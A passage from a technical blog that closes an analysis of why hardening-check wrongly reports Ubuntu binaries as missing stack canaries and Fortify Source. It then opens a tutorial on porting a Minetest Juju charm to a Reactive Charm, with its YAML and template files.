Fortify Source functions: unknown, no protectable libc functions used
Read-only relocations: yes
Immediate binding: yes
Stack clash protection: unknown, no -fstack-clash-protection instructions found
Control flow integrity: yes
</code></pre></div></div>
<p>Again, very interesting, we see <code class="language-plaintext highlighter-rouge">unknown, no protectable libc functions used</code>.</p>
<p>As mentioned previously, it is very likely looking for <code class="language-plaintext highlighter-rouge">__<function>_chk</code>
function calls in the dynamic symbol table, so let’s see what is present:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ objdump -T /usr/bin/apt -T | grep chk
00000 DF *UND* 00000 (GLIBC_2.4) __stack_chk_fail
</code></pre></div></div>
<p>We only seem to see chk functions related to the stack canary. I suppose this
is why hardening-check thinks fortify source is not enabled.</p>
<p>Again, from our manual checking of the buildlog, we know that
<code class="language-plaintext highlighter-rouge">-D_FORTIFY_SOURCE=2</code> as well as <code class="language-plaintext highlighter-rouge">-O2</code> are enabled, so the apt binary was built
with fortify source enabled. So why doesn’t it show up in the ELF dynamic symbol
table?</p>
<p>To answer this, we need to know what fortify source actually protects. This is
explained in the feature_test_macros manpage:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ man feature_test_macros
...
_FORTIFY_SOURCE (since glibc 2.3.4)
Defining this macro causes some lightweight checks to be performed to detect
some buffer overflow errors when employing various string and memory
manipulation functions (for example, memcpy(3), memset(3), stpcpy(3),
strcpy(3), strncpy(3), strcat(3), strncat(3), sprintf(3), snprintf(3),
vsprintf(3), vsnprintf(3), gets(3), and wide character variants thereof).
For some functions, argument consistency is checked; for example, a check is
made that open(2) has been supplied with a mode argument when the specified
flags include O_CREAT. Not all problems are detected, just some common cases.
...
Some of the checks can be performed at compile time (via macros logic
implemented in header files), and result in compiler warnings; other checks take
place at run time, and result in a run-time error if the check fails.
...
</code></pre></div></div>
<p>Okay, so Fortify Source adds some checks to the following functions and their
derivatives:</p>
<p><code class="language-plaintext highlighter-rouge">memcpy</code>, <code class="language-plaintext highlighter-rouge">memset</code>, <code class="language-plaintext highlighter-rouge">stpcpy</code>, <code class="language-plaintext highlighter-rouge">strcpy</code>, <code class="language-plaintext highlighter-rouge">strncpy</code>, <code class="language-plaintext highlighter-rouge">strcat</code>, <code class="language-plaintext highlighter-rouge">strncat</code>, <code class="language-plaintext highlighter-rouge">sprintf</code>,
<code class="language-plaintext highlighter-rouge">snprintf</code>, <code class="language-plaintext highlighter-rouge">vsprintf</code>, <code class="language-plaintext highlighter-rouge">vsnprintf</code>, <code class="language-plaintext highlighter-rouge">gets</code></p>
<p>Let’s check for these in <code class="language-plaintext highlighter-rouge">/usr/bin/apt</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ objdump -T /usr/bin/apt | grep 'memcpy\|memset\|stpcpy\|strcpy\|strncpy\|strcat\|strncat\|sprintf\|snprintf\|vsprintf\|vsnprintf\|gets'
</code></pre></div></div>
<p>We have our first explanation. If a binary does not call any of <code class="language-plaintext highlighter-rouge">memcpy</code>,
<code class="language-plaintext highlighter-rouge">memset</code>, <code class="language-plaintext highlighter-rouge">stpcpy</code>, <code class="language-plaintext highlighter-rouge">strcpy</code>, <code class="language-plaintext highlighter-rouge">strncpy</code>, <code class="language-plaintext highlighter-rouge">strcat</code>, <code class="language-plaintext highlighter-rouge">strncat</code>, <code class="language-plaintext highlighter-rouge">sprintf</code>,
<code class="language-plaintext highlighter-rouge">snprintf</code>, <code class="language-plaintext highlighter-rouge">vsprintf</code>, <code class="language-plaintext highlighter-rouge">vsnprintf</code>, <code class="language-plaintext highlighter-rouge">gets</code>, then the compiler doesn’t need to replace
them with their <code class="language-plaintext highlighter-rouge">__<function>_chk</code> equivalents, and thus it will fail the
Fortify Source check by hardening-check.</p>
<p>Now, I did examine <code class="language-plaintext highlighter-rouge">/usr/bin/apt</code> under different releases and architectures,
and found it had a different result on arm64 on 20.04, which I think is worth
talking about:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ objdump -T /usr/bin/apt | grep 'memcpy\|memset\|stpcpy\|strcpy\|strncpy\|strcat\|strncat\|sprintf\|snprintf\|vsprintf\|vsnprintf\|gets'
00000 DF *UND* 00000 GLIBC_2.17 memcpy
</code></pre></div></div>
<p>In this case, <code class="language-plaintext highlighter-rouge">/usr/bin/apt</code> calls <code class="language-plaintext highlighter-rouge">memcpy</code>, so why isn’t there a <code class="language-plaintext highlighter-rouge">__memcpy_chk</code>
call?</p>
<p>I was reading some documentation, and came across this tidbit in a <a href="https://gcc.gnu.org/bugzilla/show_bug.cgi?id=95556">semi-related, but not
really related, bug</a>:</p>
<blockquote>
  <p>There are no __memcpy_chk calls, which means GCC did in all cases what is
documented, replace the __builtin___memcpy_chk calls with the corresponding
__builtin_memcpy calls and handled that as usually (which isn’t always a
library call, there are many different options how a builtin memcpy can be
expanded and one can fine tune that through various command line options.<br />
It depends on what CPU the code is tuned for, whether it is considered hot or
cold code, whether the size is constant and what constant or if it is variable
and what alignment guarantees the destination and source has.</p>
</blockquote>
<p>Okay, so if we extrapolate this a bit, we can infer that gcc will initially
replace calls to <code class="language-plaintext highlighter-rouge">memcpy</code> with <code class="language-plaintext highlighter-rouge">__memcpy_chk</code>, and then, in a later optimisation pass,
it can make a conscious decision to optimise <code class="language-plaintext highlighter-rouge">__memcpy_chk</code> back to the ordinary
<code class="language-plaintext highlighter-rouge">memcpy</code>, depending on some attributes, most notably, “whether the size is
constant and what constant or if it is variable”.</p>
<p>If <code class="language-plaintext highlighter-rouge">/usr/bin/apt</code> only ever calls <code class="language-plaintext highlighter-rouge">memcpy</code> with compile time constant sizes,
into destinations the compiler knows are large enough, then there is no need to
perform a length check at runtime. In that case, <code class="language-plaintext highlighter-rouge">__memcpy_chk</code> is a waste of time, and gcc optimises it back to the
ordinary <code class="language-plaintext highlighter-rouge">memcpy</code>.</p>
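<p>A hypothetical call site (not taken from the apt source) where this folding can happen
would look something like the following, assuming gcc at <code class="language-plaintext highlighter-rouge">-O2</code> with
<code class="language-plaintext highlighter-rouge">-D_FORTIFY_SOURCE=2</code>:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <string.h>

struct header {
    unsigned char magic[4];
};

/* Both the destination size and the copy length are compile time
 * constants, and the length fits in the destination, so the fortified
 * variant of memcpy can be proven safe and gcc is free to lower it back
 * to a plain (often inlined) memcpy. No __memcpy_chk symbol ends up in
 * the dynamic symbol table, so hardening-check sees nothing to count. */
void init_header(struct header *h)
{
    static const unsigned char magic[4] = { 0x7f, 'E', 'L', 'F' };

    memcpy(h->magic, magic, sizeof(magic));
}
</code></pre></div></div>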
<p>For a concrete answer, I would need to review the usage of <code class="language-plaintext highlighter-rouge">memcpy</code> in the apt
source code, but I imagine this is what is happening, and it is reasonable.</p>
<p>But this is how we arrive at no Fortify Source functions being used in
<code class="language-plaintext highlighter-rouge">/usr/bin/apt</code>, and I imagine the rest of the binaries on the list will follow
similarly.</p>
<h1 id="conclusion">Conclusion</h1>
<p>The investigation in this article shows that automated scanning tools cannot
reliably determine if Stack Canaries or Fortify Source have been enabled at compile
time, because those protections simply don’t apply to all binaries: they can,
and will, be omitted or optimised out if the compiler determines that they are
not applicable or that it is safe to proceed without them.</p>
<p>I believe all the binaries on the lists at the beginning of the article are false
positives, and I am confident that all binaries in the Ubuntu archive are built with
<code class="language-plaintext highlighter-rouge">-fstack-protector-strong</code> and <code class="language-plaintext highlighter-rouge">-D_FORTIFY_SOURCE=2</code>, except for rare exceptions
where they are required to be turned off to work around bugs or issues. These
rare exceptions are always made for good reasons, and should be explicitly
documented in the <code class="language-plaintext highlighter-rouge">debian/rules</code> file of their source packages.</p>
<p>Hopefully you enjoyed the read, and as always feel free to <a href="/about">contact me</a>.</p>
<p>Matthew Ruffell</p>Matthew RuffellNot too long ago, I worked on a fairly interesting case where a user claimed that many of the binaries on their system were missing Stack Canaries provided through -fstack-protector-strong and additionally, many were missing Fortify Source being enabled through -D_FORTIFY_SOURCE=2. This is most unusual, since these compiler flags, along with many others, are enabled by default for all packages in the Ubuntu archive. So in this writeup, we are going to investigate this user’s claims, and try get to the bottom of the mystery of the missing compiler hardening options in binaries from the Ubuntu archive. Stay tuned.Learning How to Write Reactive Charms by Porting our Minetest Charm2021-09-07T00:00:00+00:002021-09-07T00:00:00+00:00https://ruffell.nz/programming/writeups/2021/09/07/learning-how-write-reactive-charms-by-porting-minetest-charm<p>It has been a really long time since my last blog post, so let’s fix that by
writing a followup post to my popular article on learning to write Juju Charms,
where we <a href="https://ruffell.nz/programming/writeups/2019/12/02/learning-how-to-write-juju-charms-by-creating-a-minetest-charm.html">wrote a simple Charm to deploy a production ready Minetest server</a>,
complete with postgresql integration through Juju relations.</p>
<p>Today, we are going to go a step further and delve into <em>Reactive Charms</em>, where
we can define and maintain state through <em>flags</em>. Flags let us have a memory of
events that have happened in the past, and only run certain functions to “react”
to changes in those flags.</p>
<p><img src="/assets/images/2021_018.png" alt="hero" /></p>
<p>Reactive Charms are primarily written in Python, and there are a lot of different
submodules that exist to help you develop your Charm. So buckle up, because we
are going to take our little Minetest Charm to the next level.</p>
<!--more-->
<h1 id="original-charms-vs-reactive-charms">Original Charms vs Reactive Charms</h1>
<p>Original Charms could be written in any language, and we decided to write our
old Minetest Charm in bash. Reactive Charms are intended to be developed using
Python 3, and to take advantage of the rich Python submodule ecosystem built
and maintained by the community, which provides simple blueprints to make great
production ready code.</p>
<p>Reactive Charms build on many of the same mechanisms from the older Bash Charms,
and you will find that files like <code class="language-plaintext highlighter-rouge">metadata.yaml</code> and <code class="language-plaintext highlighter-rouge">config.yaml</code> are exactly
the same, so we should be able to reuse some code from our old Charm during its
port to becoming a Reactive charm.</p>
<p>In that case, make sure you read my previous articles so you have a good
understanding of how hook based Charms work:</p>
<ul>
<li><a href="https://ruffell.nz/programming/writeups/2019/08/26/getting-started-with-juju-to-deploy-and-scale-software.html">Getting Started With Juju to Deploy and Scale Software Effortlessly</a></li>
<li><a href="https://ruffell.nz/programming/writeups/2019/12/02/learning-how-to-write-juju-charms-by-creating-a-minetest-charm.html">Learning How to Write Juju Charms by Creating a Minetest Charm</a></li>
</ul>
<p>There are three notable changes between hook Charms and Reactive Charms.</p>
<h2 id="charmhelpers-library-code">Charmhelpers Library Code</h2>
<p>There is a wealth of already implemented functions you can use to help develop
your Charm, and they are in the <code class="language-plaintext highlighter-rouge">charmhelpers</code> Python module. There is excellent
<a href="https://charm-helpers.readthedocs.io/en/latest/index.html">documentation</a>
available to help you find what these functions do, and what their API is.</p>
<p><code class="language-plaintext highlighter-rouge">charmhelpers</code> helps you write correct code the first time, by implementing
useful things like <a href="https://charm-helpers.readthedocs.io/en/latest/api/charmhelpers.core.host.html#charmhelpers.core.host.group_exists">if a group exists</a>
or <a href="https://charm-helpers.readthedocs.io/en/latest/api/charmhelpers.core.host.html#charmhelpers.core.host.add_group">creating new groups</a>,
<a href="https://charm-helpers.readthedocs.io/en/latest/api/charmhelpers.core.host.html#charmhelpers.core.host.adduser">adding users</a>,
or <a href="https://charm-helpers.readthedocs.io/en/latest/api/charmhelpers.core.host.html#charmhelpers.core.host.add_user_to_group">adding users to groups</a>.</p>
<p>You can also do things like get a <a href="https://charm-helpers.readthedocs.io/en/latest/api/charmhelpers.core.hookenv.html#charmhelpers.core.hookenv.Config">dictionary of the Charm’s config.yaml</a>, <a href="https://charm-helpers.readthedocs.io/en/latest/api/charmhelpers.core.hookenv.html#charmhelpers.core.hookenv.log">write to the
juju log</a>
or <a href="https://charm-helpers.readthedocs.io/en/latest/api/charmhelpers.core.hookenv.html#charmhelpers.core.hookenv.status_set">set juju status information</a>.</p>
<p>Have a look around, and I’m sure you will find all sorts of useful functions to
help you write your Charm.</p>
<h2 id="flags">Flags</h2>
<p>Reactive Charms have the ability to store state, so you can now selectively run
functions only if they meet certain conditions, stored in flags. This is super
useful, since you might only want to generate the configuration file once the
database has been configured, so you don’t want config-changed to be run before
the user relates a database, for example.</p>
<p>It also allows us to implement finite state machines for more complex deployments
where you don’t want race conditions or to jump steps, which is particularly
useful for managing critical data in storage Charms.</p>
<p>Flags can be named anything you want, and we use methods like <code class="language-plaintext highlighter-rouge">set_flag()</code> and
<code class="language-plaintext highlighter-rouge">clear_flag()</code> to manage them.</p>
<p>Flags are actually implemented in the <code class="language-plaintext highlighter-rouge">charms.reactive</code> Python module, and are
used as decorators on your functions. There are a whole bunch of different
decorators you can use, but the common ones are <code class="language-plaintext highlighter-rouge">when()</code>, <code class="language-plaintext highlighter-rouge">when_not()</code>,
<code class="language-plaintext highlighter-rouge">when_any()</code>, <code class="language-plaintext highlighter-rouge">hook()</code>.</p>
<p>A simple example is to guard a function so that it only does something once, much like a
singleton pattern but not as advanced. We can do this by setting a flag:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">@</span><span class="n">when_not</span><span class="p">(</span><span class="s">'myprogram.installed'</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">install_myprogram</span><span class="p">():</span>
<span class="c1"># Get your things installed...
</span>
<span class="n">set_flag</span><span class="p">(</span><span class="s">'myprogram.installed'</span><span class="p">)</span>
</code></pre></div></div>
<p>When your Charm is first deployed, <code class="language-plaintext highlighter-rouge">myprogram.installed</code> won’t be set, so we will
run the <code class="language-plaintext highlighter-rouge">install_myprogram()</code> function, and then once we set <code class="language-plaintext highlighter-rouge">myprogram.installed</code>
we can no longer fulfil the <code class="language-plaintext highlighter-rouge">@when_not()</code> decorator, and we won’t run
<code class="language-plaintext highlighter-rouge">install_myprogram()</code> again.</p>
<p>Neat.</p>
<h2 id="layers">Layers</h2>
<p>Layers are all about incorporating the flags and hooks from other Charms, and
putting them to use in your own Charm, improving code reuse and correctness.</p>
<p>Layers are effectively libraries you can import, and are mostly set and forget
with no need to write any code to make them work. You can set some options in
the layer definition file, and they will be passed to layer functions as needed.</p>
<p>In this guide, we will take advantage of the <code class="language-plaintext highlighter-rouge">basic</code> and <code class="language-plaintext highlighter-rouge">apt</code> layers, as well
as the <code class="language-plaintext highlighter-rouge">pgsql</code> interface for database management. I will show you how they work
slightly later on.</p>
<h1 id="reactive-charm-writing-method">Reactive Charm Writing Method</h1>
<p>I’m again going to be following along the <a href="https://charmsreactive.readthedocs.io/en/latest/index.html">Reactive Charm Documentation</a>
as well as the recommended <a href="https://discourse.charmhub.io/t/tutorial-charm-development-beginner-part-1/377">Reactive Charm Tutorial</a>
found on discourse.</p>
<h2 id="what-you-will-need-to-get-started">What You Will Need To Get Started</h2>
<p>We will need to have Juju installed, and also charm tools. We can get both of
these from the Snap Store.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">sudo </span>snap <span class="nb">install</span> <span class="nt">--classic</span> juju
<span class="nv">$ </span><span class="nb">sudo </span>snap <span class="nb">install</span> <span class="nt">--classic</span> charm
</code></pre></div></div>
<h2 id="create-charm-directory-structure">Create Charm Directory Structure</h2>
<p>Charms are a collection of text files, which are primarily split up into Python
scripts and YAML configuration files.</p>
<p>Much like last time, we will make a directory for our Charms to live in, but
this time, we create two more directories, <code class="language-plaintext highlighter-rouge">layers</code> and <code class="language-plaintext highlighter-rouge">interfaces</code>.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">mkdir</span> <span class="nt">-p</span> ~/charms
<span class="nv">$ </span><span class="nb">mkdir</span> <span class="nt">-p</span> ~/charms/layers
<span class="nv">$ </span><span class="nb">mkdir</span> <span class="nt">-p</span> ~/charms/interfaces
</code></pre></div></div>
<p>We also need to set up some environment variables for Charm tools to use, so
add the following to your <code class="language-plaintext highlighter-rouge">~/.bashrc</code>:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">cat</span> <span class="o"><<</span> <span class="no">EOF</span><span class="sh"> | tee --append ~/.bashrc
export CHARM_LAYERS_DIR="~/charms/layers"
export CHARM_INTERFACES_DIR="~/charms/interfaces"
</span><span class="no">EOF
</span><span class="nv">$ </span><span class="nb">source</span> ~/.bashrc
</code></pre></div></div>
<p>We can use Charm tools to automatically generate the correct directory structure
for us, so run:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">cd</span> ~/charms/layers
<span class="nv">$ </span>charm create minetest-server
</code></pre></div></div>
<p>You should now have these files in <code class="language-plaintext highlighter-rouge">~/charms/layers/minetest-server</code>:</p>
<p><img src="/assets/images/2021_002.png" alt="directory structure" /></p>
<h2 id="edit-the-readme-file">Edit the README File</h2>
<p>We need a README file to tell our users what our Charm is about, how to deploy
it, and how to scale it. We will tweak what we did last time, and the following
should do:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Minetest is a fun, free and open source voxel game inspired by Minecraft.
It supports various game modes, like survival and creative, and many more can
be added with mods.
This Charm deploys a basic game server, and is backed by a PostgreSQL database
for maximum performance. There are no mods, so you will need to add them
yourself.
To deploy:
$ juju bootstrap
$ juju deploy postgresql
$ juju deploy minetest-server
$ juju relate postgresql:db minetest-server:db
$ juju expose minetest-server
</code></pre></div></div>
<h2 id="edit-the-metadatayaml-file">Edit the metadata.yaml File</h2>
<p>The role of <code class="language-plaintext highlighter-rouge">metadata.yaml</code> has not changed, and it still tells Juju what the
Charm is called, what it does, who wrote it, what Ubuntu distribution it is
compatible with, and what interfaces are exposed and required to function.</p>
<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">name</span><span class="pi">:</span> <span class="s">minetest-server</span>
<span class="na">summary</span><span class="pi">:</span> <span class="s">Minetest is a opensource voxel game designed to be modded.</span>
<span class="na">maintainer</span><span class="pi">:</span> <span class="s">Matthew Ruffell <matthew.ruffell@canonical.com></span>
<span class="na">description</span><span class="pi">:</span> <span class="pi">|</span>
<span class="s">Minetest is a fun, opensource voxel game engine that can be customised with</span>
<span class="s">different game modes and mods.</span>
<span class="s">This charm installs Minetest with a PostgreSQL backend.</span>
<span class="na">tags</span><span class="pi">:</span>
<span class="pi">-</span> <span class="s">social</span>
<span class="na">series</span><span class="pi">:</span>
<span class="pi">-</span> <span class="s">hirsute</span>
<span class="pi">-</span> <span class="s">focal</span>
<span class="na">provides</span><span class="pi">:</span>
<span class="na">server</span><span class="pi">:</span>
<span class="na">interface</span><span class="pi">:</span> <span class="s">minetest</span>
<span class="na">requires</span><span class="pi">:</span>
<span class="na">db</span><span class="pi">:</span>
<span class="na">interface</span><span class="pi">:</span> <span class="s">pgsql</span>
</code></pre></div></div>
<h2 id="describe-configuration-options-in-configyaml">Describe Configuration Options in config.yaml</h2>
<p>Since we want users of our Charm to be able to configure the Minetest server
to suit their needs, such as changing the server message of the day, or the port
it is being served on, we need to define configuration variables in <code class="language-plaintext highlighter-rouge">config.yaml</code>.</p>
<p>This is also pretty straightforward.</p>
<p>The only thing to note is you should carefully consider what options you want to
expose to your users. Users don’t really care about the fine details, so only
expose what most people will understand and use.</p>
<p>That said, make sure you set sensible defaults. All Charms should work out of
the box on first deployment. If people are interested in changing the config,
they will; otherwise they will leave everything alone.</p>
<p>An example config is: (inspired by the existing config.yaml in <a href="https://api.jujucharms.com/charmstore/v5/~jamestait/precise/minetest-server-2/archive/config.yaml">James Tait’s
older minetest charm</a>)</p>
<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">options</span><span class="pi">:</span>
<span class="na">port</span><span class="pi">:</span>
<span class="na">default</span><span class="pi">:</span> <span class="m">30000</span>
<span class="na">description</span><span class="pi">:</span> <span class="s">Server port to listen on</span>
<span class="na">type</span><span class="pi">:</span> <span class="s">int</span>
<span class="na">server-name</span><span class="pi">:</span>
<span class="na">default</span><span class="pi">:</span> <span class="s2">"</span><span class="s">Minetest</span><span class="nv"> </span><span class="s">server"</span>
<span class="na">description</span><span class="pi">:</span> <span class="s">Name of the server</span>
<span class="na">type</span><span class="pi">:</span> <span class="s">string</span>
<span class="na">server-description</span><span class="pi">:</span>
<span class="na">default</span><span class="pi">:</span> <span class="s2">"</span><span class="s">Juju</span><span class="nv"> </span><span class="s">deployed</span><span class="nv"> </span><span class="s">Minetest</span><span class="nv"> </span><span class="s">server"</span>
<span class="na">description</span><span class="pi">:</span> <span class="s">Description of server</span>
<span class="na">type</span><span class="pi">:</span> <span class="s">string</span>
<span class="na">motd</span><span class="pi">:</span>
<span class="na">default</span><span class="pi">:</span> <span class="s2">"</span><span class="s">Welcome!"</span>
<span class="na">description</span><span class="pi">:</span> <span class="s">Message of the day</span>
<span class="na">type</span><span class="pi">:</span> <span class="s">string</span>
<span class="na">strict-protocol-version-checking</span><span class="pi">:</span>
<span class="na">default</span><span class="pi">:</span> <span class="s2">"</span><span class="s">false"</span>
<span class="na">description</span><span class="pi">:</span> <span class="s">Set to </span><span class="no">true</span><span class="s"> to disallow old clients from connecting</span>
<span class="na">type</span><span class="pi">:</span> <span class="s">string</span>
<span class="na">creative-mode</span><span class="pi">:</span>
<span class="na">default</span><span class="pi">:</span> <span class="s2">"</span><span class="s">false"</span>
<span class="na">description</span><span class="pi">:</span> <span class="s">Set to </span><span class="no">true</span><span class="s"> to enable creative mode (unlimited inventory)</span>
<span class="na">type</span><span class="pi">:</span> <span class="s">string</span>
<span class="na">enable-damage</span><span class="pi">:</span>
<span class="na">default</span><span class="pi">:</span> <span class="s2">"</span><span class="s">false"</span>
<span class="na">description</span><span class="pi">:</span> <span class="s">Enable players getting damage and dying</span>
<span class="na">type</span><span class="pi">:</span> <span class="s">string</span>
<span class="na">default-password</span><span class="pi">:</span>
<span class="na">default</span><span class="pi">:</span> <span class="s2">"</span><span class="s">"</span>
<span class="na">description</span><span class="pi">:</span> <span class="s">New users need to input this password</span>
<span class="na">type</span><span class="pi">:</span> <span class="s">string</span>
<span class="na">default-privs</span><span class="pi">:</span>
<span class="na">default</span><span class="pi">:</span> <span class="s2">"</span><span class="s">build,shout"</span>
<span class="na">description</span><span class="pi">:</span> <span class="pi">|</span>
<span class="s">Available privileges: build, shout, teleport, settime, privs, ban</span>
<span class="s">See /privs in game for a full list on your server and mod configuration</span>
<span class="na">type</span><span class="pi">:</span> <span class="s">string</span>
<span class="na">enable-pvp</span><span class="pi">:</span>
<span class="na">default</span><span class="pi">:</span> <span class="s2">"</span><span class="s">true"</span>
<span class="na">description</span><span class="pi">:</span> <span class="s">Whether to enable players killing each other</span>
<span class="na">type</span><span class="pi">:</span> <span class="s">string</span>
</code></pre></div></div>
<h2 id="set-the-copyright-of-the-charm">Set the Copyright of the Charm</h2>
<p>All Charms should include a copyright file, which includes details about the
copyright and licensing status of the files inside the Charm.</p>
<p>We will again use the <a href="https://www.debian.org/doc/packaging-manuals/copyright-format/1.0/">debian/copyright
file format</a>
to license our charm, by placing the following in a file called <code class="language-plaintext highlighter-rouge">copyright</code>.</p>
<p>We will take the <a href="https://github.com/openstack/charm-interface-keystone/blob/master/copyright">OpenStack Keystone Charm copyright</a>
file as inspiration, so the below will do:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0
Files: *
Copyright: 2021, Matthew Ruffell.
License: GPL-3

License: GPL-3
This package is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3 of the License, or
(at your option) any later version.
.
This package is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
.
You should have received a copy of the GNU General Public License
along with this package; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
.
On Debian systems, the complete text of the GNU General
Public License can be found in `/usr/share/common-licenses/GPL-3'.
</code></pre></div></div>
<h2 id="make-an-icon-for-the-charm-store">Make an Icon for the Charm Store</h2>
<p>If you want your Charm to look nice on the Charm store listing or on the Juju
GUI, then you should probably set an icon.</p>
<p>Open up <code class="language-plaintext highlighter-rouge">icon.svg</code> in Inkscape or whatever vector editor you like,
and make a nice icon:</p>
<p><img src="/assets/images/2021_003.png" alt="icon" /></p>
<p>I used the icon found at <code class="language-plaintext highlighter-rouge">/usr/share/icons/hicolor/scalable/apps/minetest.svg</code>
to make this icon.</p>
<h2 id="defining-layers-and-their-options">Defining Layers and Their Options</h2>
<p>Layers are a mechanism to integrate functionality from related Charms into your
own Charm. Think of them as libraries you can import and leverage to perform
tasks correctly, so you don’t have to get into the specifics yourself.</p>
<p>For example, take the <code class="language-plaintext highlighter-rouge">layer:apt</code> layer. This implements package management via
apt, and it will automatically be called when the Charm is deployed in the
install phase. We can include some options in the <code class="language-plaintext highlighter-rouge">options:</code> section, and we can
tell it to automatically install minetest, without having to specify anything
more. The days of manually writing <code class="language-plaintext highlighter-rouge">apt install minetest</code> are over.</p>
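<p>If you ever need to install a package at runtime rather than at deploy time, the
apt layer also exposes a small Python API. A minimal sketch, assuming the standard
<code class="language-plaintext highlighter-rouge">charms.apt</code> helpers shipped by layer:apt:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Sketch only: layer:apt provides the charms.apt module at runtime.
import charms.apt

# Queue the package; the layer installs it on the next hook invocation.
charms.apt.queue_install(['minetest'])
</code></pre></div></div>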
<p>The <code class="language-plaintext highlighter-rouge">layer:basic</code> layer implements basic hooks like <code class="language-plaintext highlighter-rouge">start</code>, <code class="language-plaintext highlighter-rouge">stop</code>, and uses
magic to link different hooks and conditions to flags. This is the layer that
is also responsible for autogenerating our hooks directory when we run <code class="language-plaintext highlighter-rouge">charm
build</code>.</p>
<p>Finally, we also specify the <code class="language-plaintext highlighter-rouge">interface:pgsql</code> interface, which tells Juju that
we will be using the postgresql charm, and that we will be using related flags
like <code class="language-plaintext highlighter-rouge">db.connected</code> and <code class="language-plaintext highlighter-rouge">db.database.available</code>.</p>
<p>Our final <code class="language-plaintext highlighter-rouge">layers.yaml</code> looks like the following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>includes:
- 'layer:basic'
- 'layer:apt'
- 'interface:pgsql'
options:
apt:
packages:
- minetest
</code></pre></div></div>
<h2 id="creating-templates-for-game-configuration-and-system-service-files">Creating Templates for Game Configuration and System Service Files</h2>
<p>Templates are a wonderful new addition to Reactive Charms. They allow us to
define our configuration files in one place, and fill out any unknown variables
when the templates are rendered. Make a directory to hold them:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ mkdir templates
</code></pre></div></div>
<p>We will need two templates. One, a systemd service file to run minetest on boot,
and the other will be the actual minetest configuration.</p>
<p>Let’s do the systemd service first.</p>
<p>Make a file called <code class="language-plaintext highlighter-rouge">minetest.service</code> and put the following service description in it:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[Unit]
Description=Minetest
Documentation=https://wiki.minetest.net/Main_Page
[Service]
Type=simple
User=minetest
ExecStart=/usr/games/minetest --server
ExecStop=/bin/kill -2 $MAINPID
[Install]
WantedBy=multi-user.target
</code></pre></div></div>
<p>Note, we can use the Jinja2 templating engine to fill variables for us when we
render the file later on. We can place values within <code class="language-plaintext highlighter-rouge">'{{ object.attribute }}'</code>
style syntax.</p>
<p>For example, we can fetch the <code class="language-plaintext highlighter-rouge">server-name</code> configuration from the Juju config
entries with <code class="language-plaintext highlighter-rouge">'{{ config["server-name"] }}'</code>. We will pass
in database details later, and use <code class="language-plaintext highlighter-rouge">my_database</code> as an object placeholder for now.</p>
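<p>If you want to see what the templating engine does in isolation, here is a tiny
standalone sketch using Jinja2 directly (charmhelpers’ <code class="language-plaintext highlighter-rouge">render()</code> wraps this same
engine; the values below are made up):</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>from jinja2 import Template

# The same substitution render() performs for us behind the scenes.
template = Template('server_name = {{ config["server-name"] }}')
print(template.render(config={'server-name': 'Minetest server'}))
# prints: server_name = Minetest server
</code></pre></div></div>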
<p>Let’s use this information to create the minetest configuration file. Name it
<code class="language-plaintext highlighter-rouge">world.mt</code> and fill it with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>port = {{ config["port"] }}
server_name = {{ config["server-name"] }}
server_description = {{ config["server-description"] }}
motd = {{ config["motd"] }}
strict_protocol_version_checking = {{ config["strict-protocol-version-checking"] }}
creative_mode = {{ config["creative-mode"] }}
enable_damage = {{ config["enable-damage"] }}
default_password = {{ config["default-password"] }}
default_privs = {{ config["default-privs"] }}
enable_pvp = {{ config["enable-pvp"] }}
gameid = minetest
backend = postgresql
player_backend = postgresql
auth_backend = sqlite3
pgsql_connection = host= {{ database["private-address"] }} port= {{ database["port"] }} user= {{ database["user"] }} password= {{ database["password"] }} dbname= {{ database["database"] }}
pgsql_player_connection = host= {{ database["private-address"] }} port= {{ database["port"] }} user= {{ database["user"] }} password= {{ database["password"] }} dbname= {{ database["database"] }}
</code></pre></div></div>
<h2 id="writing-the-actual-deployment-and-management-code">Writing the Actual Deployment and Management Code</h2>
<p>In Reactive Charms, we implement the logic to manage the Charm in
<code class="language-plaintext highlighter-rouge">reactive/charm_name.py</code>, or in our case, <code class="language-plaintext highlighter-rouge">reactive/minetest_server.py</code>.</p>
<p>Have a read of the final code, and I’ll walk through how it works below.</p>
